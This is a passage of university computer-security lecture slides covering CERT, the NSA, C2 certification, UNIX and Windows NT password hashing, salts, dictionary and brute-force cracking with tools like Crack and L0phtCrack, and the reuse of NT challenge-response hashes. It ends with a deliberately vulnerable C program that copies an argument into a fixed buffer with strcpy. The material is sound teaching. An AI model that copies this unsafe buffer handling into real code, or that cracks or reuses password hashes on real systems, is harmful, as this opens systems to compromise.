![Page 430: Introduction to Computer Security CS3235cs3235/2003-semesterI/foils.pdf1928: Maths Dept at University of Poznan: Marian Re-jewski, Jerzy Rozycki, Henryk Zygalski. Decoded some messages](https://reader033.fdocuments.in/reader033/viewer/2022053020/5f294e69dc3f0f712c43cfab/html5/thumbnails/430.jpg)
Computer Emergency Response Team
The CERT Coordination Center is the organizationthat grew from the computer emergency responseteam formed by the Defense Advanced ResearchProjects Agency (DARPA) in November 1988 in re-sponse to the needs identified during the Internetworm incident. The CERT charter is to work with theInternet community to facilitate its response to com-puter security events involving Internet hosts, to takeproactive steps to raise the community’s awarenessof computer security issues, and to conduct researchtargeted at improving the security of existing systems.
CS3235 - Hugh Anderson’s notes. Page number: 429
![Page 431: Introduction to Computer Security CS3235cs3235/2003-semesterI/foils.pdf1928: Maths Dept at University of Poznan: Marian Re-jewski, Jerzy Rozycki, Henryk Zygalski. Decoded some messages](https://reader033.fdocuments.in/reader033/viewer/2022053020/5f294e69dc3f0f712c43cfab/html5/thumbnails/431.jpg)
CERT
If you are ever involved in a computer security incident itis useful to get in touch with CERT.
They provide incident reports and advisories, and can li-aise with other system administration people if the attackon your system comes from outside your organization.
CS3235 - Hugh Anderson’s notes. Page number: 430
![Page 432: Introduction to Computer Security CS3235cs3235/2003-semesterI/foils.pdf1928: Maths Dept at University of Poznan: Marian Re-jewski, Jerzy Rozycki, Henryk Zygalski. Decoded some messages](https://reader033.fdocuments.in/reader033/viewer/2022053020/5f294e69dc3f0f712c43cfab/html5/thumbnails/432.jpg)
CERT Incident Note IN-99-04
Here is an excerpt from an incident report:Similar Attacks Using Various RPC Services
Thursday, July 22, 1999
Overview
We have recently received an increasing number of reports that intruders are using similar methodsto compromise systems. We have seen intruders exploit three different RPC service vulnerabilities;however, similar artifacts have been found on compromised systems.
...
CS3235 - Hugh Anderson’s notes. Page number: 431
![Page 433: Introduction to Computer Security CS3235cs3235/2003-semesterI/foils.pdf1928: Maths Dept at University of Poznan: Marian Re-jewski, Jerzy Rozycki, Henryk Zygalski. Decoded some messages](https://reader033.fdocuments.in/reader033/viewer/2022053020/5f294e69dc3f0f712c43cfab/html5/thumbnails/433.jpg)
SIGINT
Signals Intelligence (SIGINT) broke the Japanese mili-tary code and learned of plans to invade Midway Island.
In 1943 they began the VENONA project to examine en-crypted Soviet diplomatic communications.
The messages were double-encrypted and were ex-tremely difficult to crack.
Almost all of the US KGB messages in 1944 and 1945were broken between 1947 and 1952.
CS3235 - Hugh Anderson’s notes. Page number: 432
![Page 434: Introduction to Computer Security CS3235cs3235/2003-semesterI/foils.pdf1928: Maths Dept at University of Poznan: Marian Re-jewski, Jerzy Rozycki, Henryk Zygalski. Decoded some messages](https://reader033.fdocuments.in/reader033/viewer/2022053020/5f294e69dc3f0f712c43cfab/html5/thumbnails/434.jpg)
NSA - National Security Agency
Successor of SIGINT
The National Security Agency is the USA’s cryptologicorganization.
It coordinates, directs, and performs highly specializedactivities to protect U.S. information systems and pro-duce foreign intelligence information.
CS3235 - Hugh Anderson’s notes. Page number: 433
![Page 435: Introduction to Computer Security CS3235cs3235/2003-semesterI/foils.pdf1928: Maths Dept at University of Poznan: Marian Re-jewski, Jerzy Rozycki, Henryk Zygalski. Decoded some messages](https://reader033.fdocuments.in/reader033/viewer/2022053020/5f294e69dc3f0f712c43cfab/html5/thumbnails/435.jpg)
NSA - National Security Agency
NSA employs the country’s premier codemakers andcodebreakers.
It is said to be the largest employer of mathematicians inthe United States and perhaps the world.
CS3235 - Hugh Anderson’s notes. Page number: 434
![Page 436: Introduction to Computer Security CS3235cs3235/2003-semesterI/foils.pdf1928: Maths Dept at University of Poznan: Marian Re-jewski, Jerzy Rozycki, Henryk Zygalski. Decoded some messages](https://reader033.fdocuments.in/reader033/viewer/2022053020/5f294e69dc3f0f712c43cfab/html5/thumbnails/436.jpg)
Rainbow documents
The NSA created various documents describing the cri-teria for evaluating the security behaviour of machines.
These criteria were published in a series of documentswith brightly coloured covers, and hence became knownas the Rainbow series. (red book, yellow book...)
CS3235 - Hugh Anderson’s notes. Page number: 435
![Page 437: Introduction to Computer Security CS3235cs3235/2003-semesterI/foils.pdf1928: Maths Dept at University of Poznan: Marian Re-jewski, Jerzy Rozycki, Henryk Zygalski. Decoded some messages](https://reader033.fdocuments.in/reader033/viewer/2022053020/5f294e69dc3f0f712c43cfab/html5/thumbnails/437.jpg)
C2 security
DOD 5200.28-STD - “Department of Defense Trusted Com-puter System Evaluation Criteria”:
• To provide a standard to manufacturers (for security fea-tures related to confidentiality)...
• To provide DoD components with a metric with which toevaluate the degree of trust...
• To provide a basis for specifying security requirements inacquisition specifications.
CS3235 - Hugh Anderson’s notes. Page number: 436
![Page 438: Introduction to Computer Security CS3235cs3235/2003-semesterI/foils.pdf1928: Maths Dept at University of Poznan: Marian Re-jewski, Jerzy Rozycki, Henryk Zygalski. Decoded some messages](https://reader033.fdocuments.in/reader033/viewer/2022053020/5f294e69dc3f0f712c43cfab/html5/thumbnails/438.jpg)
C2 security example
The TCB14 shall require users to identify themselves toit before beginning to perform any other actions that theTCB is expected to mediate.
Furthermore, the TCB shall use a protected mechanism(e.g., passwords) to authenticate the user’s identity.
14Trusted Computing Base.
CS3235 - Hugh Anderson’s notes. Page number: 437
![Page 439: Introduction to Computer Security CS3235cs3235/2003-semesterI/foils.pdf1928: Maths Dept at University of Poznan: Marian Re-jewski, Jerzy Rozycki, Henryk Zygalski. Decoded some messages](https://reader033.fdocuments.in/reader033/viewer/2022053020/5f294e69dc3f0f712c43cfab/html5/thumbnails/439.jpg)
Microsoft and C2
Windows NT Workstation vs 3.5 with U.S. Service Pack 3was the first Microsoft product that has completed C2 test-ing, and is only certified if using the same hardware, andinstalled software, and does not include any network con-nection. The NT utility c2config.exe sets up an NT systemto pass the C2 tests.
The 1998 attacks on the Pentagon involved theft and mod-ification of data, as well as denial-of-service. The attackedmachines were C2-secure Windows NT machines.
CS3235 - Hugh Anderson’s notes. Page number: 438
![Page 440: Introduction to Computer Security CS3235cs3235/2003-semesterI/foils.pdf1928: Maths Dept at University of Poznan: Marian Re-jewski, Jerzy Rozycki, Henryk Zygalski. Decoded some messages](https://reader033.fdocuments.in/reader033/viewer/2022053020/5f294e69dc3f0f712c43cfab/html5/thumbnails/440.jpg)
UNIX and C2
Many UNIX systems have also got C2 certification, andcome configured this way from the manufacturer.
There are numerous examples of hacked UNIX sys-tems found on the Internet. In 1996, a site I managedin New Zealand was the target of a malicious attack byintruders from Australia and Belgium.
Given all this, C2 certification is probably not a good guideas to the security of your system.
CS3235 - Hugh Anderson’s notes. Page number: 439
![Page 441: Introduction to Computer Security CS3235cs3235/2003-semesterI/foils.pdf1928: Maths Dept at University of Poznan: Marian Re-jewski, Jerzy Rozycki, Henryk Zygalski. Decoded some messages](https://reader033.fdocuments.in/reader033/viewer/2022053020/5f294e69dc3f0f712c43cfab/html5/thumbnails/441.jpg)
This session
• Ethics and computing
• Organizations and standards
• UNIX passwords
• NT passwords
CS3235 - Hugh Anderson’s notes. Page number: 440
![Page 442: Introduction to Computer Security CS3235cs3235/2003-semesterI/foils.pdf1928: Maths Dept at University of Poznan: Marian Re-jewski, Jerzy Rozycki, Henryk Zygalski. Decoded some messages](https://reader033.fdocuments.in/reader033/viewer/2022053020/5f294e69dc3f0f712c43cfab/html5/thumbnails/442.jpg)
Password security
Morris and Thompson article:
http://citeseer.nj.nec.com/morris79password.html
Computer generated passwords more predictable thanuser ones...
CS3235 - Hugh Anderson’s notes. Page number: 441
![Page 443: Introduction to Computer Security CS3235cs3235/2003-semesterI/foils.pdf1928: Maths Dept at University of Poznan: Marian Re-jewski, Jerzy Rozycki, Henryk Zygalski. Decoded some messages](https://reader033.fdocuments.in/reader033/viewer/2022053020/5f294e69dc3f0f712c43cfab/html5/thumbnails/443.jpg)
UNIX password security
UNIX systems are traditionally open systems, given theirbackground in university environments.
As such, the security on them is often minimal.
It is common for UNIX accounts to be made availablerelatively freely.
For example, at the MIT Media lab15 all computers havebeen password-free until recently.
15MIT - home of Kerberos!
CS3235 - Hugh Anderson’s notes. Page number: 442
![Page 444: Introduction to Computer Security CS3235cs3235/2003-semesterI/foils.pdf1928: Maths Dept at University of Poznan: Marian Re-jewski, Jerzy Rozycki, Henryk Zygalski. Decoded some messages](https://reader033.fdocuments.in/reader033/viewer/2022053020/5f294e69dc3f0f712c43cfab/html5/thumbnails/444.jpg)
UNIX password security
UNIX systems are vulnerable to a wide range of attacks,particularly internal attacks.
All Unix systems have a root account.
This account has a UID and GID of zero, and once rootaccess is obtained on a UNIX system, there is very littlethat cannot be done.
CS3235 - Hugh Anderson’s notes. Page number: 443
![Page 445: Introduction to Computer Security CS3235cs3235/2003-semesterI/foils.pdf1928: Maths Dept at University of Poznan: Marian Re-jewski, Jerzy Rozycki, Henryk Zygalski. Decoded some messages](https://reader033.fdocuments.in/reader033/viewer/2022053020/5f294e69dc3f0f712c43cfab/html5/thumbnails/445.jpg)
UNIX accounts
Account passwords are constructed to meet the followingrequirements:
• Each password has at least six characters.
• Only the first eight characters are significant.
CS3235 - Hugh Anderson’s notes. Page number: 444
![Page 446: Introduction to Computer Security CS3235cs3235/2003-semesterI/foils.pdf1928: Maths Dept at University of Poznan: Marian Re-jewski, Jerzy Rozycki, Henryk Zygalski. Decoded some messages](https://reader033.fdocuments.in/reader033/viewer/2022053020/5f294e69dc3f0f712c43cfab/html5/thumbnails/446.jpg)
UNIX accounts
There are many other accounts found on Unix systems, notjust those for clients:
sysadm - A System V administration account, and
daemon - A daemon process account, and
uucp - The UUCP owner, and
lp - The print spooler owner.
When protecting a UNIX system, we must protect all theseaccounts - not just root.
CS3235 - Hugh Anderson’s notes. Page number: 445
![Page 447: Introduction to Computer Security CS3235cs3235/2003-semesterI/foils.pdf1928: Maths Dept at University of Poznan: Marian Re-jewski, Jerzy Rozycki, Henryk Zygalski. Decoded some messages](https://reader033.fdocuments.in/reader033/viewer/2022053020/5f294e69dc3f0f712c43cfab/html5/thumbnails/447.jpg)
UNIX password file
Account information is kept in a file called /etc/passwd.
It normally consists of seven colon-delimited fields, andmay look like the following:
hugo:aAbBcJJJx23F55:501:100:Hughs Account:/home/hugo:/bin/tcsh
CS3235 - Hugh Anderson’s notes. Page number: 446
![Page 448: Introduction to Computer Security CS3235cs3235/2003-semesterI/foils.pdf1928: Maths Dept at University of Poznan: Marian Re-jewski, Jerzy Rozycki, Henryk Zygalski. Decoded some messages](https://reader033.fdocuments.in/reader033/viewer/2022053020/5f294e69dc3f0f712c43cfab/html5/thumbnails/448.jpg)
/etc/passwd fields
hugo: The account or user name.
aAbBcJJJx23F5 5: A one-way encrypted (hashed)password
501: The UID - unique user number
100: The GID - group number for user.
Hughs Account: Account information.
/home/hugo: The account’s home directory
/bin/tcsh: A program to run when you log in
CS3235 - Hugh Anderson’s notes. Page number: 447
![Page 449: Introduction to Computer Security CS3235cs3235/2003-semesterI/foils.pdf1928: Maths Dept at University of Poznan: Marian Re-jewski, Jerzy Rozycki, Henryk Zygalski. Decoded some messages](https://reader033.fdocuments.in/reader033/viewer/2022053020/5f294e69dc3f0f712c43cfab/html5/thumbnails/449.jpg)
UNIX passwords
When you log in with your account name and password,the password is encrypted and the resulting hash is com-pared to the hash stored in the password file.
If they are equal, the system accepts that you’ve typed inthe correct password and grants you access.
CS3235 - Hugh Anderson’s notes. Page number: 448
![Page 450: Introduction to Computer Security CS3235cs3235/2003-semesterI/foils.pdf1928: Maths Dept at University of Poznan: Marian Re-jewski, Jerzy Rozycki, Henryk Zygalski. Decoded some messages](https://reader033.fdocuments.in/reader033/viewer/2022053020/5f294e69dc3f0f712c43cfab/html5/thumbnails/450.jpg)
UNIX passwords
UNIX uses a DES-like algorithm to calculate the en-crypted password.
The password is used as the DES key (eight 7-bit charac-ters make a 56 bit DES key) to encrypt a block of binaryzeroes.
The result of this encryption is the hash value.
Note: the password is not encrypted, it is the key used toperform the encryption!
CS3235 - Hugh Anderson’s notes. Page number: 449
![Page 451: Introduction to Computer Security CS3235cs3235/2003-semesterI/foils.pdf1928: Maths Dept at University of Poznan: Marian Re-jewski, Jerzy Rozycki, Henryk Zygalski. Decoded some messages](https://reader033.fdocuments.in/reader033/viewer/2022053020/5f294e69dc3f0f712c43cfab/html5/thumbnails/451.jpg)
UNIX salt
A strengthening feature of UNIX is that it introduces tworandom characters in the alogrithm (the salt).
This ensures that two equal passwords result in two dif-ferent hashes.
From viewing the UNIX password file you can not tell iftwo persons have the same password.
CS3235 - Hugh Anderson’s notes. Page number: 450
![Page 452: Introduction to Computer Security CS3235cs3235/2003-semesterI/foils.pdf1928: Maths Dept at University of Poznan: Marian Re-jewski, Jerzy Rozycki, Henryk Zygalski. Decoded some messages](https://reader033.fdocuments.in/reader033/viewer/2022053020/5f294e69dc3f0f712c43cfab/html5/thumbnails/452.jpg)
UNIX salt
To prevent crackers from simply encrypting an entiredictionary and then looking up the hash, the salt wasadded to the algorithm to create a possible 4096 differenthashes for a particular password.
This lengthens the cracking time because it becomes alittle harder to store an encrypted dictionary online as theencrypted dictionary now would have to take up 4096times the disk space.
This does not make password cracking harder, just moretime consuming.
CS3235 - Hugh Anderson’s notes. Page number: 451
![Page 453: Introduction to Computer Security CS3235cs3235/2003-semesterI/foils.pdf1928: Maths Dept at University of Poznan: Marian Re-jewski, Jerzy Rozycki, Henryk Zygalski. Decoded some messages](https://reader033.fdocuments.in/reader033/viewer/2022053020/5f294e69dc3f0f712c43cfab/html5/thumbnails/453.jpg)
Crypt code
Sample crypt code from LINUX uClibc. The code has thefollowing structure:
extern char * crypt(const char *key, const char *salt) /* Are we supposed to be using the MD5 replacement/* instead of DES... */
if (salt[0]==’$’ && salt[1]==’1’ && salt[2]==’$’)return md5 crypt(key, salt);
elsereturn des crypt(key, salt);
CS3235 - Hugh Anderson’s notes. Page number: 452
![Page 454: Introduction to Computer Security CS3235cs3235/2003-semesterI/foils.pdf1928: Maths Dept at University of Poznan: Marian Re-jewski, Jerzy Rozycki, Henryk Zygalski. Decoded some messages](https://reader033.fdocuments.in/reader033/viewer/2022053020/5f294e69dc3f0f712c43cfab/html5/thumbnails/454.jpg)
Cracking
It is very time consuming, but given enough time, bruteforce cracking will get the password.
The hashed passwords are compared with the entry inthe /etc/passwd file.
BTW - You cannot try to log in using all the possible pass-words, as UNIX systems enforce 10 second timeouts af-ter three consecutive login failures.
CS3235 - Hugh Anderson’s notes. Page number: 453
![Page 455: Introduction to Computer Security CS3235cs3235/2003-semesterI/foils.pdf1928: Maths Dept at University of Poznan: Marian Re-jewski, Jerzy Rozycki, Henryk Zygalski. Decoded some messages](https://reader033.fdocuments.in/reader033/viewer/2022053020/5f294e69dc3f0f712c43cfab/html5/thumbnails/455.jpg)
Dictionary cracking
Dictionary password cracking is the most popularmethod for cracking Unix passwords.
The cracking program will take a word list, and one at atime try to crack one or all of the passwords listed in thepassword file.
Some password crackers will filter and/or mutate:
substitute numbers for certain letters, add prefixes or suffixes, or switch case or order of letters.
CS3235 - Hugh Anderson’s notes. Page number: 454
![Page 456: Introduction to Computer Security CS3235cs3235/2003-semesterI/foils.pdf1928: Maths Dept at University of Poznan: Marian Re-jewski, Jerzy Rozycki, Henryk Zygalski. Decoded some messages](https://reader033.fdocuments.in/reader033/viewer/2022053020/5f294e69dc3f0f712c43cfab/html5/thumbnails/456.jpg)
Dictionary cracking
A popular cracking utility is called Crack .
Crack can use user-definable rules for word manipula-tion/mutation to maximize dictionary effectiveness.
Crack merges dictionaries, turns the password files intoa sorted list, and generates lists of possible passwordsfrom the merged dictionary or from information gleanedabout users from the password file.
CS3235 - Hugh Anderson’s notes. Page number: 455
![Page 457: Introduction to Computer Security CS3235cs3235/2003-semesterI/foils.pdf1928: Maths Dept at University of Poznan: Marian Re-jewski, Jerzy Rozycki, Henryk Zygalski. Decoded some messages](https://reader033.fdocuments.in/reader033/viewer/2022053020/5f294e69dc3f0f712c43cfab/html5/thumbnails/457.jpg)
/etc/shadow passwords
Once the password hashes are moved to the shadow file,its permissions are changed as follows:
opo 35# ls -l /etc/shadow-r-------- 1 root sys 3429 Aug 20 14:46 /etc/shadow
opo 36#
These permissions ensure that ordinary users are unable tolook at the password hashes, and hence are unable to trydictionary attacks.
CS3235 - Hugh Anderson’s notes. Page number: 456
![Page 458: Introduction to Computer Security CS3235cs3235/2003-semesterI/foils.pdf1928: Maths Dept at University of Poznan: Marian Re-jewski, Jerzy Rozycki, Henryk Zygalski. Decoded some messages](https://reader033.fdocuments.in/reader033/viewer/2022053020/5f294e69dc3f0f712c43cfab/html5/thumbnails/458.jpg)
This session
• Ethics and computing
• Organizations and standards
• UNIX passwords
• NT passwords
CS3235 - Hugh Anderson’s notes. Page number: 457
![Page 459: Introduction to Computer Security CS3235cs3235/2003-semesterI/foils.pdf1928: Maths Dept at University of Poznan: Marian Re-jewski, Jerzy Rozycki, Henryk Zygalski. Decoded some messages](https://reader033.fdocuments.in/reader033/viewer/2022053020/5f294e69dc3f0f712c43cfab/html5/thumbnails/459.jpg)
Microsoft password security
Two one-way password hashes are stored on NT systems:
• a LanManager hash, and
• a Windows NT hash.
The LanManager hash supports the older LanManager pro-tocol originally used in Windows and OS/2. In an all-NT en-vironment it is desirable to turn off LanManager passwords,as it is easier to crack. The NT method uses a strongeralgorithm and allows mixed-cased passwords.
CS3235 - Hugh Anderson’s notes. Page number: 458
![Page 460: Introduction to Computer Security CS3235cs3235/2003-semesterI/foils.pdf1928: Maths Dept at University of Poznan: Marian Re-jewski, Jerzy Rozycki, Henryk Zygalski. Decoded some messages](https://reader033.fdocuments.in/reader033/viewer/2022053020/5f294e69dc3f0f712c43cfab/html5/thumbnails/460.jpg)
Microsoft password security
The database containing these hashes on an NT systemis called the SAM (Security Access Manager)
If you have administrative access16, the program pw-dump can extract the hashes.
16Originally, anyone could extract the hashed passwords from the SAM, as Microsoftbelieved that “if they didn’t tell anyone the algorithms they used, no-one could discoverwhat they had done”. Security through obscurity is not a safe strategy, and JeremyAllison was able to de-obfuscate the SAM entries relatively quickly.
CS3235 - Hugh Anderson’s notes. Page number: 459
![Page 461: Introduction to Computer Security CS3235cs3235/2003-semesterI/foils.pdf1928: Maths Dept at University of Poznan: Marian Re-jewski, Jerzy Rozycki, Henryk Zygalski. Decoded some messages](https://reader033.fdocuments.in/reader033/viewer/2022053020/5f294e69dc3f0f712c43cfab/html5/thumbnails/461.jpg)
Microsoft salt
Microsoft does not salt during hash generation, so oncea potential password has generated a hash it can bechecked against all accounts.
The cracking software takes advantage of this.
CS3235 - Hugh Anderson’s notes. Page number: 460
![Page 462: Introduction to Computer Security CS3235cs3235/2003-semesterI/foils.pdf1928: Maths Dept at University of Poznan: Marian Re-jewski, Jerzy Rozycki, Henryk Zygalski. Decoded some messages](https://reader033.fdocuments.in/reader033/viewer/2022053020/5f294e69dc3f0f712c43cfab/html5/thumbnails/462.jpg)
LanManager encryption
LanManager encryption is created by taking the user’splaintext password, capitalising it, and either truncatingto 14 bytes, or padding to 14 bytes with null bytes.
This 14 byte value is used as two 56-bit DES keys to en-crypt an eight byte value, forming a 16 byte value whichis stored by the server and client.
This value is known as the hashed password .
CS3235 - Hugh Anderson’s notes. Page number: 461
![Page 463: Introduction to Computer Security CS3235cs3235/2003-semesterI/foils.pdf1928: Maths Dept at University of Poznan: Marian Re-jewski, Jerzy Rozycki, Henryk Zygalski. Decoded some messages](https://reader033.fdocuments.in/reader033/viewer/2022053020/5f294e69dc3f0f712c43cfab/html5/thumbnails/463.jpg)
NT encryption
Windows NT encryption is a higher quality mechanism,consisting of doing an MD4 hash on a Unicode version ofthe user’s password.
This also produces a 16 byte hash value that is non-reversible.
CS3235 - Hugh Anderson’s notes. Page number: 462
![Page 464: Introduction to Computer Security CS3235cs3235/2003-semesterI/foils.pdf1928: Maths Dept at University of Poznan: Marian Re-jewski, Jerzy Rozycki, Henryk Zygalski. Decoded some messages](https://reader033.fdocuments.in/reader033/viewer/2022053020/5f294e69dc3f0f712c43cfab/html5/thumbnails/464.jpg)
NT Password security
Note that the LANManager hash is similar to UNIX levelof cyptography
The NT hash is better
But... neither use strong encryption, and
the network login mechanism has some problems.
CS3235 - Hugh Anderson’s notes. Page number: 463
![Page 465: Introduction to Computer Security CS3235cs3235/2003-semesterI/foils.pdf1928: Maths Dept at University of Poznan: Marian Re-jewski, Jerzy Rozycki, Henryk Zygalski. Decoded some messages](https://reader033.fdocuments.in/reader033/viewer/2022053020/5f294e69dc3f0f712c43cfab/html5/thumbnails/465.jpg)
Challenge response
BAD GUY!
PDCCLIENT
Snooping!
Login network traffic
CS3235 - Hugh Anderson’s notes. Page number: 464
![Page 466: Introduction to Computer Security CS3235cs3235/2003-semesterI/foils.pdf1928: Maths Dept at University of Poznan: Marian Re-jewski, Jerzy Rozycki, Henryk Zygalski. Decoded some messages](https://reader033.fdocuments.in/reader033/viewer/2022053020/5f294e69dc3f0f712c43cfab/html5/thumbnails/466.jpg)
Challenge-response protocol
When a client wishes to use a resource, it first requestsa connection and negotiates the protocol that the clientand server will use.
In the reply to this request the server generates and ap-pends an 8 byte, random value - this is stored in theserver after the reply is sent and is known as the chal-lenge .
It is different for every client connection.
CS3235 - Hugh Anderson’s notes. Page number: 465
![Page 467: Introduction to Computer Security CS3235cs3235/2003-semesterI/foils.pdf1928: Maths Dept at University of Poznan: Marian Re-jewski, Jerzy Rozycki, Henryk Zygalski. Decoded some messages](https://reader033.fdocuments.in/reader033/viewer/2022053020/5f294e69dc3f0f712c43cfab/html5/thumbnails/467.jpg)
Challenge-response protocol
The client then uses the hashed password (16 byte val-ues described above), appended with 5 null bytes, asthree 56 bit DES keys, each of which is used to en-crypt the challenge 8 byte value, forming a 24 byte valueknown as the response .
This calculation is done on both hashes of the user’spassword, and both responses are returned to the server,giving two 24 byte values.
CS3235 - Hugh Anderson’s notes. Page number: 466
![Page 468: Introduction to Computer Security CS3235cs3235/2003-semesterI/foils.pdf1928: Maths Dept at University of Poznan: Marian Re-jewski, Jerzy Rozycki, Henryk Zygalski. Decoded some messages](https://reader033.fdocuments.in/reader033/viewer/2022053020/5f294e69dc3f0f712c43cfab/html5/thumbnails/468.jpg)
Challenge-response protocol
The server then reproduces the above calculation, us-ing its own value of the 16 byte hashed password andthe challenge value that it kept during the initial protocolnegotiation.
It then checks to see if the 24 byte value it calculatesmatches the 24 byte value returned to it from the client.
If these values match exactly, then the client knew thecorrect password and is allowed access.
CS3235 - Hugh Anderson’s notes. Page number: 467
![Page 469: Introduction to Computer Security CS3235cs3235/2003-semesterI/foils.pdf1928: Maths Dept at University of Poznan: Marian Re-jewski, Jerzy Rozycki, Henryk Zygalski. Decoded some messages](https://reader033.fdocuments.in/reader033/viewer/2022053020/5f294e69dc3f0f712c43cfab/html5/thumbnails/469.jpg)
Challenge-response protocol
There are good points about this:
• The server never knows or stores the cleartext of theusers password - just the 16 byte hashed values derivedfrom it.
• The cleartext password or 16 byte hashed values arenever transmitted over the network - thus increasing se-curity.
CS3235 - Hugh Anderson’s notes. Page number: 468
![Page 470: Introduction to Computer Security CS3235cs3235/2003-semesterI/foils.pdf1928: Maths Dept at University of Poznan: Marian Re-jewski, Jerzy Rozycki, Henryk Zygalski. Decoded some messages](https://reader033.fdocuments.in/reader033/viewer/2022053020/5f294e69dc3f0f712c43cfab/html5/thumbnails/470.jpg)
Challenge-response protocol
However, there is also a bad side:
• The 16 byte hashed values are a "password equivalent".You cannot derive the users password from them, butthey can be used in a modified client to gain access toa server.
• The initial protocol negotiation is generally insecure, andcan be hijacked in a range of ways. One common hijackinvolves convincing the server to allow clear-text pass-words.
CS3235 - Hugh Anderson’s notes. Page number: 469
![Page 471: Introduction to Computer Security CS3235cs3235/2003-semesterI/foils.pdf1928: Maths Dept at University of Poznan: Marian Re-jewski, Jerzy Rozycki, Henryk Zygalski. Decoded some messages](https://reader033.fdocuments.in/reader033/viewer/2022053020/5f294e69dc3f0f712c43cfab/html5/thumbnails/471.jpg)
Challenge-response protocol
Despite functionality added to NT to protect unauthorizedaccess to the SAM, the mechanism is trivially insecure
Both the hashed values can be retrieved using the net-work sniffer mentioned before, and they are as-good-aspasswords.
CS3235 - Hugh Anderson’s notes. Page number: 470
![Page 472: Introduction to Computer Security CS3235cs3235/2003-semesterI/foils.pdf1928: Maths Dept at University of Poznan: Marian Re-jewski, Jerzy Rozycki, Henryk Zygalski. Decoded some messages](https://reader033.fdocuments.in/reader033/viewer/2022053020/5f294e69dc3f0f712c43cfab/html5/thumbnails/472.jpg)
Attack
Relies on flawed mechanism.
Even without network access, it is possible by variousmeans to access the SAM password hashes, and withnetwork access it is easy.
The hashed values are password equivalents, and maybe used directly if you have modified client software.
The attack considered here is the use of either a dic-tionary, or brute force attack directly on the passwordhashes (which must be first collected somehow).
CS3235 - Hugh Anderson’s notes. Page number: 471
![Page 473: Introduction to Computer Security CS3235cs3235/2003-semesterI/foils.pdf1928: Maths Dept at University of Poznan: Marian Re-jewski, Jerzy Rozycki, Henryk Zygalski. Decoded some messages](https://reader033.fdocuments.in/reader033/viewer/2022053020/5f294e69dc3f0f712c43cfab/html5/thumbnails/473.jpg)
Attack
L0phtCrack is a tool for turning Microsoft Lan Manager andNT password hashes back into the original clear text pass-words. It may be configured to run in different ways.
Dictionary cracking: L0phtCrack running on a PentiumPro 200 checked a password file with 100 passwordsagainst a 8 Megabyte (about 1,000,000 word) dictionaryfile in under one minute.
Brute force: L0phtCrack running on a Pentium Pro 200checked a password file with 10 passwords using the al-pha character set (A-Z) in 26 hours.
CS3235 - Hugh Anderson’s notes. Page number: 472
![Page 474: Introduction to Computer Security CS3235cs3235/2003-semesterI/foils.pdf1928: Maths Dept at University of Poznan: Marian Re-jewski, Jerzy Rozycki, Henryk Zygalski. Decoded some messages](https://reader033.fdocuments.in/reader033/viewer/2022053020/5f294e69dc3f0f712c43cfab/html5/thumbnails/474.jpg)
Attack time
Character set size Size of computation Relative time taken
26 8.353 ∗ 109 1.00
36 8.060 ∗ 1010 9.65
46 4.455 ∗ 1011 53.33
68 6.823 ∗ 1012 816.86
So if 26 characters takes 26 hours to complete, a worst-case scenario for 36 characters (A-Z,0-9) would take 250hours or 10.5 days. A password such as take2asp1r1nwould probably be computed in about 7 days.
CS3235 - Hugh Anderson’s notes. Page number: 473
![Page 475: Introduction to Computer Security CS3235cs3235/2003-semesterI/foils.pdf1928: Maths Dept at University of Poznan: Marian Re-jewski, Jerzy Rozycki, Henryk Zygalski. Decoded some messages](https://reader033.fdocuments.in/reader033/viewer/2022053020/5f294e69dc3f0f712c43cfab/html5/thumbnails/475.jpg)
Microsoft base security fix
1. Disable the use of LanManager passwords.
2. Don’t log in over network as administrator
3. Encrypt all network traffic
4. Use long passwords, and all allowable characters
5. Use an alternative login system
6. Use an unsniffable network cabling system.
CS3235 - Hugh Anderson’s notes. Page number: 474
![Page 476: Introduction to Computer Security CS3235cs3235/2003-semesterI/foils.pdf1928: Maths Dept at University of Poznan: Marian Re-jewski, Jerzy Rozycki, Henryk Zygalski. Decoded some messages](https://reader033.fdocuments.in/reader033/viewer/2022053020/5f294e69dc3f0f712c43cfab/html5/thumbnails/476.jpg)
Chapter 10
Lecture 10 - More(in)security
CS3235 - Hugh Anderson’s notes. Page number: 475
![Page 477: Introduction to Computer Security CS3235cs3235/2003-semesterI/foils.pdf1928: Maths Dept at University of Poznan: Marian Re-jewski, Jerzy Rozycki, Henryk Zygalski. Decoded some messages](https://reader033.fdocuments.in/reader033/viewer/2022053020/5f294e69dc3f0f712c43cfab/html5/thumbnails/477.jpg)
Last session
• Ethics and computing
• Organizations and standards
• UNIX passwords
• NT passwords
CS3235 - Hugh Anderson’s notes. Page number: 476
![Page 478: Introduction to Computer Security CS3235cs3235/2003-semesterI/foils.pdf1928: Maths Dept at University of Poznan: Marian Re-jewski, Jerzy Rozycki, Henryk Zygalski. Decoded some messages](https://reader033.fdocuments.in/reader033/viewer/2022053020/5f294e69dc3f0f712c43cfab/html5/thumbnails/478.jpg)
This session
• Buffer overflow attacks
• PkZip attack
• DVDs and the CSS
• SSH and SSL
• PGPfone
CS3235 - Hugh Anderson’s notes. Page number: 477
![Page 479: Introduction to Computer Security CS3235cs3235/2003-semesterI/foils.pdf1928: Maths Dept at University of Poznan: Marian Re-jewski, Jerzy Rozycki, Henryk Zygalski. Decoded some messages](https://reader033.fdocuments.in/reader033/viewer/2022053020/5f294e69dc3f0f712c43cfab/html5/thumbnails/479.jpg)
Buffer overflow
Most well known compromise of computer systems
One of a general class of problems caused by
software that does not check its parameters for ex-treme values.
CS3235 - Hugh Anderson’s notes. Page number: 478
![Page 480: Introduction to Computer Security CS3235cs3235/2003-semesterI/foils.pdf1928: Maths Dept at University of Poznan: Marian Re-jewski, Jerzy Rozycki, Henryk Zygalski. Decoded some messages](https://reader033.fdocuments.in/reader033/viewer/2022053020/5f294e69dc3f0f712c43cfab/html5/thumbnails/480.jpg)
Buffer overflow
Examine the way programs use memory.
Presentation based on
http://destroy.net/machines/security/P49-14-Aleph-One
CS3235 - Hugh Anderson’s notes. Page number: 479
![Page 481: Introduction to Computer Security CS3235cs3235/2003-semesterI/foils.pdf1928: Maths Dept at University of Poznan: Marian Re-jewski, Jerzy Rozycki, Henryk Zygalski. Decoded some messages](https://reader033.fdocuments.in/reader033/viewer/2022053020/5f294e69dc3f0f712c43cfab/html5/thumbnails/481.jpg)
Simple Program
void main (int argc, char *argv[]) char buffer[512]; printf ("Argument is %s\n", argv[1]); strcpy (buffer, argv[1]);
CODE LISTING vulnerable.c
CS3235 - Hugh Anderson’s notes. Page number: 480
